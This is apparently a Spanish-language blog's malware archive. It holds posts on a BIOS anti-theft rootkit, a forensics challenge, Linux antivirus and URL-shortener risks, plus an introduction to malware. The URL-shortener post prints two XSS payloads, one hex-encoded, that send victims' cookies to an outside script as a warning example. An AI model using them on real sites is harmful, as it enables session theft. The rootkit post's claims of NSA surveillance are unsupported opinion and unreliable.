Rincón Informático

Un rincon para hablar sobre GNU/Linux, seguridad informatica, y mas!!

Archive for the ‘Malware’ Category

Rootkit, un virus espía indetectable

Posted by fortress On marzo - 22 - 2010

Hace poco, expertos en seguridad informática expusieron públicamente en la conferencia “Black hat cómo funciona el sistema comercialmente denominado “CompuTrace” y que originalmente es un software “antirobo”. Contenido en la memoria del BIOS, el se oculta ante el Sistema Operativo siendo casi indetectable e imperceptible, y persiste luego de los típicos “formateos”.

El título de este artículo va a sonar paranoico para el clásico perfil del medio de Internet: Escéptico, exhibicionista, confiado, fan, consumista, conformista, dependiente, etc.

Según ellos (la gran mayoría) en la nueva moral “moderna” la privacidad debe morir… Y todo el mundo debe estar registrado con nombre, apellido, foto, y todos sus datos personales, junto a sus amigos en alguna “Red Social”.

Indirectamente, según la nueva moral, todo aquel que quiera privacidad es un potencial “terrorista”, y nadie quiere estar “marginado fuera del sistema”.

Ojala lo que yo escribiese sería de Ciencia Ficción, o estaría equivocado. (Uno muchas veces se equivoca). Pero en esta temática la cual escribo (política y tecnología) el tiempo y la experiencia no hacen más que comprobar y confirmar la información o los ensayos que vengo publicando en la red.

En este caso, para el lector no informático o tecnofóbico: Nos referimos a BIOS, el Software esencial de toda computadora/ordenador, el cual está grabado en una memoria o chip de todas las mismas, y cuya función es elemental: encender y reconocer el hardware de todas las PC, lo primero que se ejecuta.

Recientemente, unos expertos en seguridad argentinos han mostrado en conferencias públicas cómo funciona el sistema comercialmente denominado “CompuTrace” y que originalmente es un Software “antirobo”. En pocas palabras, han mostrado públicamente como la mayoría de los BIOS populares (AMI, Award, Phoenix) pueden estar infectados fácilmente por un Rootkit (un Software que se oculta ante el Sistema Operativo siendo casi indetectable e imperceptible) contenido en la memoria del BIOS, haría a este persistente contra los típicos formateos de un disco rígido, y luego enviando conectándose a una casa central, monitoreando con la IP (dirección única en Internet) entre otra información y probablemente dando control remoto a los agentes.

Esta tecnología está patentada por EEUU, teniendo en cuenta las leyes antidemocráticas que hay (como las de las puertas traseras como requisito legal), es un dato importante. Esta línea es experimental sólo la incluí para que sepan que la verdadera fuente de este artículo es http:///http://www.estrellaroja.info

Lo peligroso: Este sistema comenzó a implementarse MASIVAMENTE en las PC y portatiles Notebook’s. Quedando activado o estando ahí posibilitando fácilmente su activación y dejando vulnerable a la privacidad de dicha máquina. El mismo rootkit es independiente del Sistema Operativo. La pregunta inevitable, ¿la información de pueblos enteros, de Estados soberanos pueden ser fácilmente también afectadas por este método?

A estilo “bonustrack”, informar también: Emails encriptados gratuitos serían una trampa, era un poco “sospechoso” los servicios de Correo encriptado como Hushmail o S-mail, estarían TAMBIÉN [0] siendo controlados por la NSA [1]. Como también Google estaría empezando a ser informadora de esta agencia [2].

Cuba ya se ha puesto a la defensiva contra el plan imperialista de “exportación de Facebook/MSN” [3], aunque el ALBA recientemente sufre una operación de prensa contra Chávez relacionada con “la censura de Internet”- EEUU: Campaña contra Chávez e Internet http://www.europapress.es/internacional/noticia-venezuela-venezuela-crea-comision-especial-controlar-internet-20100317033647.html

China ha denunciado a EEUU: http://www.jornada.unam.mx/2010/03/13/index.php?section=mundo&article=016n1mun

Información utilizable para la desactivación del BIOS RootKit: http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=Deactivate_the_Rootkit

FUENTE

Nuevo reto: Analisis Forense

Posted by Epsilon On diciembre - 25 - 2009

reto informatica forense

Para todos aquellos  que quieran hacer algo muy interesante y productivo en esta época de vacaciones, nuestro amigo Dragon,  ha diseñado un forense denominado análisis forense(muchas gracias a dragon por haberse tomado la molestia de crear este y compartirlo con nosotros), en los siguientes enlaces encontraras un paquete con todo lo necesario para desarrollarlo:

parte 1
parte 2
parte 3
parte 4
parte 5

Para descomprimir el paquete necesitan una clave, pueden pedirla a cualquiera de estos dos correos:

dragonjar en gmail
4v4t4r en gmail

el escenario del es el siguiente:

Gracias a una denuncia por ciberBullyng a la Unidad de Delitos Informáticos Lunix, se pretende llevar a cabo un análisis forense a un sistema propiedad de un sospechoso que tiene contacto con la víctima. Este análisis se realizará bajo la sospecha que desde éste equipo se están realizando actos delictivos y judicializables.
Se sospecha que éste distribuye contenido pedófilo por medio de Internet.

El objetivo y las reglas:

El objetivo es realizar un análisis forense al sistema de la persona sospechosa. Para ello se entrega un snapshot del sistema objetivo. Esta instantánea podrá ser restaurada para llevar a cabo el respectivo análisis en “caliente” por medio de los aplicativos software VMWare Player o VMWare Server (ambas aplicaciones gratuitas y multiplataforma).

La finalidad del análisis será determinar entre otros los siguientes puntos:

  1. Antecedentes del Sistema/Escenario
  2. Recolección de datos
  3. Descripción de la evidencia
  4. Entorno del análisis/Descripción de las herramientas
  5. Análisis de la evidencia/Información del sistema analizado /Aplicaciones /Servicios
  6. Metodología
  7. Descripción de los hallazgos
  8. Huellas del comportamiento y de las actividades del sospechoso
  9. Cronología de las actividades del sospechoso
  10. Posibles víctimas del sospechoso
  11. Rastros del sospechoso
  12. Conclusiones
  13. Recomendaciones a los padres
  14. Referencias

Esperamos que todos participen ya que es un buen método para aprender sobre un tema tan amplio como lo es la informática forense, no hay mejor metodología de aprendizaje que la practica, cualquier cosa estaremos dispuestos a resolver dudas y esperen muy pronto la solución a este .

Antivirus libres: una alternativa para el malware en GNU/Linux

Posted by Epsilon On diciembre - 10 - 2009

Como lo prometido es deuda, en esta ocasión vamos hablar un poco sobre aquellos libres  que nos pueden ayudar  en  algún momento cuando el malware en plataformas libres sea un hecho.

En el post anterior describimos una solución privativa: NOD32, sin embargo, es claro que ningun defensor del Software libre estará de acuerdo con instalar este tipo de aplicacion cerrada, por tal motivo, a continuación nombraremos algunas alternativas libres.

Clamav

Su instalación es muy sencilla

apt-get install clamav

Es distribuido bajo licencia GPL, disponible para GNU/Linux,  Windows, Solaris, FreeBSD, OpenBSD. Detecta alrededor de 320 000 , gusanos y troyanos, incluyendo programados como macros de Microsoft Office. Además puede escanear archivos comprimidos, formatos de correo electrónico y formatos especiales.

HAVP

Este es un proxy con filtro ,  el cual se interpone entre tu navegador y la Internet y es capaz de analizar todo el trafico entrante  en busca de cualquier código malicioso  en una pagina web (JS y Html ) o una imagen. su instalación es igual de sencilla que el anterior:

apt-get install havp

Como pueden ver  no hay mucho de donde escoger  en cuanto este tema, debido a que el malware en GNU/Linux  no es muy común en la actualidad, no obstante a medida que el tema vaya avanzando saldrá en el camino nuevas alternativas que resuelvan la problematica. Si alguno de ustedes conoce otro  GPL  esperamos que nos compartas cual es.

El peligro de los acortadores de URL’S

Posted by Epsilon On octubre - 17 - 2009

Hoy en dia, gracias al furor que ha tenido twitter y otras redes sociales,  se ha hecho muy  comun utilizar paginas que nos brindan el servicio de acortar las direcciones. Este servicio es muy util, ya que  nos permiten  acortar aquellas urls, que  son demasiado largas y que son dificiles de recordar. Su uso  es muy sencillo solo basta con entrar a un sitio de tantos en la red que  nos dan este servicio  como por ejemplo: Bit.ly o tinyurl.com alli en una caja de texto pegamos la url que deseamos recortar  damos click en el boton y listo tendremos nuestra url  recortada, algo asi como esto:

http://bit.ly/4G4ueH
http://tinyurl.com/ykfuc64

Sin embargo, esto puede llegar a convertirse en un arma de doble filo, debido a que  algun individuo de forma malintencionada puede “camuflar” una url infectada con algun troyano, o una url con un script que capture tus cookies (XSS). Y esto como ocurre?? Hay gente que puede caer en un truco tan viejo?? La respuesta es SI. Pongamos un ejemplo, un informatico  ve  que  una nena  muy linda, comparte un enlace de este tipo:

http://sitio.com/prueba.php?variable=”><script>document.location=’http://www.lugarscript.com/cgi-bin/cookie.cgi? ‘%20+document.cookie</script>

o este:

http://host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

Para cualquier persona con sentido comun (bueno eso creo y espero)  que vea este enlace, lo va a ver sospechoso y sabra que ese enlace no es lo que dice ser la nena linda.  Pero que pasaria si se usa una web que nos recorta la url? Nuestro enlace malicioso quedaria asi:

http://bit.ly/2SOKtG

o asi:

http://bit.ly/3hPNpy

Ahora si, mas de una persona daria click en ese enlace, si la nena linda dice que en esa pequeña url se encuentran sus fotos desnuda. Igualmente suele suceder con el malware, muchas veces viene camuflado de esa forma, y  algunas personas  dan click sin pensar que hay detras de esa url corta.

Recomendaciones.

  • Tener sentido comun, y no dar click en cualquier enlace.
  • No visitar enlaces sospechosos compartidos por mujeres voluptuosas  o en su defecto hombres.
  • Antes de dar click en una url de este tipo, pase el puntero por el enlace, y este le va a mostrar la verdadera url, de tal forma, sabras hacia donde te  lleva el enlace.

Estas son pequeñas cosas,  pero  que muchos usuarios de la red no lo saben,  y son blancos faciles de todo el malware que existe en la red.

Especial Malware, Negocio Familiar. Introducción.

Posted by SpiderM@N On octubre - 9 - 2009

El Malware, negocio de familia

Antes que nada ruego a todas los informáticos y a las pocas informáticas que nos leen que me disculpen, he estado horriblemente (no tengo otra palabra para decirlo) alejado de Rincon Informático y eso es imperdonable.

Y así es como nacen los especiales, en realidad pensaba escribir de un tipo de malware es especial, sin embargo pensé que sería más justo explicar primero que es el malware y luego si los tipos que existen, pero ¿cómo dejar pasar a los demás si todos son apasionantes?

Malware es un extranjerismo que se usa en los ambientes informáticos para referirnos a los programas o mejor, al software que tiene un objetivo dañino para con nuestros computadores,  en algunos casos no es necesariamente dañino contra nosotros, pero si pueden usar nuestro computador para que este ejecute acciones en contra de otro computador o de un servidor empresarial.

La palabra como tal es una abreviatura de “Malicious Software” (Programa malicioso, traducido a nuestro idioma) y como tal es un tipo de software así como el software de mensajería instantánea y demás.

El negocio del Malware es ilegal pero como todo lo ilegal, es bastante lucrativo.

¿Por qué?

Supongamos un ejemplo, uno sencillo y que siempre está en boca de muchas personas…

Soy dueño una compañía que desarrolla y distribuye software y por alguna u otra razón dicho software NO es muy conocido, para intentar que este sea más popular puedo “pagarle” (a algún desarrollador de Malware) por un que SOLAMENTE mi lo detecte y así el cuándo dicho este causando estragos mi ya estará preparado mientras la competencia hace las respectivas “firmas” para detectarlo, obviamente ganaré muchos para mi software.

No solo este ejemplo es algo que pueda ser tangible hay muchas otras perspectivas y pensamientos sobre el tema, pero es algo en lo que podemos meditar.

Volviendo al tema del Malware y específicamente de este especial que comienza en Rincon Informático, esta es tan solo la entrada de introducción, que tiene como finalidad hacerle entender al de Sistemas operacionales Windows (ya que es sobre esta plataforma en la que la mayoría (sino todo) del Malware se ejecuta) que NO todo el software malicioso es , que hay diferentes tipos y que cada uno tiene como tal un objetivo.

Entrada dedicada a mi Muñeca la comprensiva.